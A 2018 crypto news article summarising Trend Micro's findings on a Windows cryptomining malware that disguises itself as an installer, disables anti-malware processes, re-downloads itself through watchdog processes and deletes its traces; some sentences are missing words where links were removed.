The obfuscation capabilities of cryptocurrency mining malware creators are increasingly getting more and more sophisticated, according to cybersecurity researchers at Trend Micro.
This is evidenced by a new cryptocurrency mining malware that the researchers came across which employs multiple evasion techniques in order to evade detection. Identified as Coinminer.Win32.MALXMR.TIAOODAM, the malicious software poses as an installer file for the Windows operating system when it arrives on the machine of its target. This use of a real component of the Windows OS not only makes it appear less suspicious but also allows the malware to bypass particular security filters.
From the analysis conducted by the cybersecurity researchers, the cryptojacking software installs itself in this folder: %AppData%RoamingMicrosoftWindowsTemplateFileZilla Server. FileZilla is a free open-source application for transferring files over the internet. If the directory does not already exist the malware proceeds to create one.
Among the files that are contained in the directory include a script created to terminate any anti-malware processes which may be running.
Somewhere in Eastern Europe…
The installation process of the particular involves more measures aimed at preventing detection. Interestingly, the installation process is done in Cyrillic, indicating that the creators are possibly based in Eastern or other places that use the writing system.
After installation, the malware will create three new Service Host processes, some of which are used to re-download the malware in case of termination:
“The first and second SvcHost processes will act as a watchdog, most likely to remain persistent. These are responsible for re-downloading the Windows Installer (.msi) file via a Powershell command when any of the injected svchost processes are terminated,” Trend Micro’s Janus Agcaoili and Gilbert Sison wrote in a .
The crypto mining malware also possesses a self-destruct mechanism aimed at ensuring that detection and analysis becomes even more difficult. This is achieved by deleting every file contained in the installation directory as well as getting rid of all traces of installation.
Taking No Chances
According to Trend Micro’s researchers, the creators of the malware are also taking extra precaution to avoid detection by using WiX, a popular Windows Installer, as a packer.
Cryptojacking is up 459% in 2018, and it’s the NSA’s Fault
— CCN (@CryptoCoinsNews)
This comes at a time when various studies have shown that incidences of are on the rise across the globe. As CCN reported in September, cybersecurity consortium Cyber Threat Alliance estimates that this year.
Earlier this year, Kaspersky Labs indicated that ransomware attacks were declining and this was down to the fact that , as it is more lucrative.
Featured Image from Shutterstock
Follow us on or subscribe to our newsletter .
Published at Sun, 11 Nov 2018 00:20:02 +0000
